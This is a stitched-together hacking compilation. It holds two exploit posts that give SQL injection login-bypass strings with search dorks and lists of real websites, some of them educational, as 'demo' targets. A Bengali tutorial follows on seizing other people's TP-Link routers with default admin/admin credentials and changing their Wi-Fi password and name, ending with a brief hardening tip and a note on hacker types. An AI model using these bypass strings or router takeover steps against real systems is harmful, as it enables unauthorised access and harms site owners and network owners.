Z Web Solutions CMS Admin Page Bypass

# Exploit Title : Z Web Solutions CMS Admin Page Bypass
# Exploit Author : mr_mask_black & sir.h4m1d
# Vendor Homepage : www.thezweb.com
# Google Dork : intext:"Website design & SEO Services from Z Web Solutions"
# Date: 2016/6/26
# Tested On : win 7
# Contact:mr_mask_black@yahoo.com
######################
# Vulnerable File : index.php
# Describe : Search dork and select Target. Put admin/index.php After url such as :
# http://site.com/admin/index.php
# Now enter fill Gebruikersnaam(username) and Wachtwoord(Password) like the information below :
# Username: '=' 'OR'
# Password: '=' 'OR'
#
# OK :)
#
# Demo :
# http://maikholvad.com/admin/index.php
# http://www.sansadadarshgramyojnachikhli.com/admin/index.php
# http://www.khatmenubuwwat.org/admin/index.php
# http://www.markazeislami.com/admin/index.php
# http://jamiahkosamba.com/admin/index.php

"Design & Developed By : IT-FAST" Admin Bypass

######################
# Exploit Title : "Design & Developed By : IT-FAST" Admin Bypass
# Exploit Author : Akib love
# Bing Dork : Design & Developed By : IT-FAST
# Contact: akibkhan495@gmail.com
######################

# http://site.com/app/login.php
#
# Enter Username and Password : ' or 1=1 limit 1-- -+
#
# admin :' or 1=1 limit 1-- -+
# password :' or 1=1 limit 1-- -+
#
# Demo :

http://jshs.edu.bd/app/login.php

http://gmfrgcollege.edu.bd/app/index.php

এইবার শুধু ওয়াইফাই না…ওয়াইফাই রাউটার হ্যাক করুন…

আমাদের দেশে ওয়াইফাই আস্তে আস্তে জনপ্রিয়তা পাচ্ছে…..

ঘরে ঘরে ব্রডব্যন্ড আসার পাশাপাশি ব্যবহার হচ্ছে ওয়াইফাই রাউটার।।

যদি আপনি ওয়াইফাই রাউটার করতে চান তবে অবশ্যই সেই ওয়াইফাই এর সাথে কানেক্টেড থাকা লাগবে

সেজন্য আপনার ওয়াইফাই এর পাসোয়ার্ড লাগবে .. রাউটারের মালিক আপনার পরিচত হলে পাসওয়ার্ড তার কাছ থেকে চেয়ে নিতে পারেন অপরিচিত হলে  হ্যাক করে নিতে পারেন সহজ কিছু উপায়ে

আমাদের দেশের বেশীর ভাগ রাউটার ই Tp-Link company এর ।এবং রাউটার কিনে যখন কেউ সেটাপ করে সেটা ডেটা ক্যবল এর সাহায্য করে থাকে।

সুতরাং বেশীর ভাগ রাউটার মালিক দের ই এই ব্যপারে আইডিয়া থাকে না যে তার রাউটার ডাটা ক্যবল ছাড়া ও শুধু মাত্র মোবাইল ফোন দিয়েই সম্পূর্ন  নিয়ন্ত্রন করা যাবে। আমরা সেটার ই সুযোগ নিবো

রাউটার এর কন্ট্রোল নেয়ার পর আপনি যা করতে পারবেন-

• ওয়াইফাই এর নাম পরিবর্তন করতে পারবেন
• পাসওয়ার্ড পরিবর্তন করতে পারবেন
• রাউটার নতুন ভাবে সেটাপ করে দিতে পারবেন

এক কথায় আপনি সম্পূর্ন রাউটার এর ক্ষমতা পেয়ে যাবেন

তাহলে শুরু করা যাক..

আশা করি আপনি যে রাউটার হ্যাক করবেন সেটার ওয়াইফাই পাসোয়ার্ড সংগ্রহ করে কানেক্ট করে ফেলছেন..তাহলে পরবর্তী ধাপে আসি

আপনি এটা কম্পিউটার ছাড়া ও মোবাইলের ডিফল্ট ব্রাউজার থেকে ও করতে পারেন

এখন যদি আপনি এন্ড্রয়েড ব্যবহার কারী হোন তাহলে মোবাইলের ডিফল্ট ব্রাউজার /Uc browser  থেকে নিচের লিংকে যান ওয়াইফাই এর সাথে কানেক্টেড থাকা অবস্থায়

=>http://192.168.0.1 যদি এটা কাজ না করে এখানে যান http://tplinklogin.net

http://tplinklogin.net শুধু মাত্র টিপি লিংক কোম্পানীর রাউটার এর জন্য কাজ করবে

এখন একটা পপ আপ আসবে যেটা রাউটার এর ইউজার নেম এবং পাসোয়ার্ড চাবে

সাধারনত রাউটার এর ডিফল্ট ইউজার নেম আর পাসোয়ার্ড নিচের মতো থাকে

User Name: admin password   :admin

যদি কেউ এডভান্সড রাউটার ইউজার না হয় তারা এই ব্যপার টা জানেই না এবং পাসওয়ার্ড ও পরিবর্তন করে না .. সুতরাং আপনি এই ইউজার নেম আর পাসোয়ার্ড এর মাধ্যমেই রাউটার এর একসেস পেয়ে যেতে পারেন

সুতরাং এটা দিয়ে চেষ্টা করুন  username/password as admin/admin

আপনি যদি সৌভাগ্যবান হন এই পাসোয়ার্ড দিয়েই রাউটার এর এডমিন প্যনেল পেয়ে যাবেন

রাউটার থেকে যেভাবে ওয়াইফাই পাসোয়ার্ড পরিবর্তন করবেন:

রাউটার এর ওয়াইফাই পাসোয়ার্ড পরিবর্তন করার জন্য রাউটার এর এডমিন প্যনেল থেকে নিচের মতো যান

Wireless=>Wireless Security তারপর “WPA-PSK/WPA2-PSK” এর নিচে আপনি রাউটার এর ওয়াইফাই পাসোয়ার্ড দেখতে পারবেন এবং পরিবর্তন করতে পারবেন  .. পাসোয়ার্ড পরিবর্তন করার পর সেভ করুন এবং রাউটার রিবুট করুন… তারপর আপনার নতুন পাসোয়ার্ড কার্যকরী হবে

হ্যাক করা রাউটার এর ওয়াইফাই নাম যেভাবে পরিবর্তন করবেন?

রাউটার এডমিন প্যনেল থেকে খুব সহজেই আপনি এটা করতে পারেন

নিচের মত যান

Wireless=>Wireless Settings  এবং  SSID1 এর ভিতর নতুন নাম দিন [যে নামে পরিবর্তন করতে চান] .. তারপর সেভ করে রাউটার রিভবুট করুন..তারপর আপনি আপনার নতুন দেয়া নামে ওয়াইফাই টাকে দেখতে পাবেন :p

এইভাবেই আপনি খুব সহজ ভাবে রাউটার এর পুরো নিয়ন্ত্রন নিয়ে নিতে পারেন!!

NB:আমি এই পদ্ধতিটা শুধু মাত্র আপনাদের শেখানোর জন্য শেয়ার করেছি…  দয়া করে এই পদ্ধতি ব্যবহার করে কারো ক্ষতি করবেন না 

কীভাবে রাউটারের নিরাপত্তা বাড়াবেন[রাউটার মালিক দের জন্য]:

যদি আপনি ক্যবল দিয়ে আপয়ার রাউটার সেটাপ করে থাকেন তবে আপনার জেনে রাখা ভালো ক্যবল ছাড়া ও আপনি এই কাজটা করতে পারেন 192.168.0.1 তে গিয়ে যখন আপনি আপনার ওয়াইফাই এর সাথে কানেক্টেড আছেন

ডিফল্ট ইউজার নেম আর পাসোয়ার্ড দিয়ে লগিন করুন user name/password : admin/admin

তারপর এডমিন প্যনেল এর নিএর দিক থেকে  System Tools=>Password এ যান ..প্রথমে আপনার ডিফল্টা ইউজার নেম/পাসোয়ার্ড টা দিন [admin/admin] তারপর নতুন ইউজার নেম আর পাসোয়ার্ড দিন

তারপর উপরের নিয়মে কেউ আপনার রাউটার এর একসেস নিতে পারবে না তবে অন্য কোন ভাবে পারবে

আপনি কি হ্যাকার হতে চান, তা হলে জেনে নিন কি করবেন?

হ্যাকিং বলতে বুঝায় আপনি অনুমতি ছাড়া কোন তথ্য চুরি করে নিজের প্রয়োজনে ব্যবহার করা। হ্যাকিং অনেক ধরনের হতে পারে। আর এই কাজ গুলো যারা করে তাদের হ্যাকার বলা হয়।
হ্যাকিং কে শিল্পের সাথে তুলনা করা হয়, যেটি আয়ত্ত্ব করতে প্রচুর ধৈর্য আর ইকটু বুদ্ধির প্রয়োজন হয়। আর আশ্চর্যের বিষয় এর হ্যাকারদের মাঝেও আবার বিভিন্ন প্রকারভেদ রয়েছে।
ব্ল্যাক হ্যাট হ্যাকার গ্রে হ্যাট হ্যাকার হোয়াইট হ্যাট হ্যাকার ব্ল্যাক হ্যাট হ্যাকারঃ যারা সব ধরনের তথ্য নিজের স্বার্থের জন্য ব্যবহার করে, তাদের ব্ল্যাক হ্যাট বলা হয়। যারা সব সময় কম্পিউটার, বিভিন্ন সিস্টেমের দূর্বলতা খুজে বেড়ায় নিজের আর্থিক অথবা যেকোন পার্সোনাল লাভের আশায়। নিজের স্বার্থের জন্য এরা অন্যের অনেক ক্ষতি করে থাকে। এই হ্যাকারদের খারাপের তালিকায় রাখা যায়।
গ্রে হ্যাট হ্যাকার ঃ এরা ভাল মন্দ দুটির সংমিশ্রন। এদের যখন যেটা ইচ্ছা হয় সেটাই করবে বলে ঠিক করে। এরা উপকার, ক্ষতি দুটিই করতে পারে।
হোয়াইট হ্যাট হ্যাকার ঃ এদের ভালদের সারিতে ফেলা যায়। যারা শুধু মাত্র জানার আগ্রহ থেকে রিসার্চ করে। কম্পিউটার, ওয়েব পেজ, কোন সিস্টেমে কোন ্দূর্বলতা খুজে পেলে এরা এর সাথে সংশ্লিষ্ট কর্মকর্তাদের ব্যাপারটি সম্পর্কে অবগত
করে। এরা খুবই জ্ঞানী প্রকৃতির হয়ে থাকে।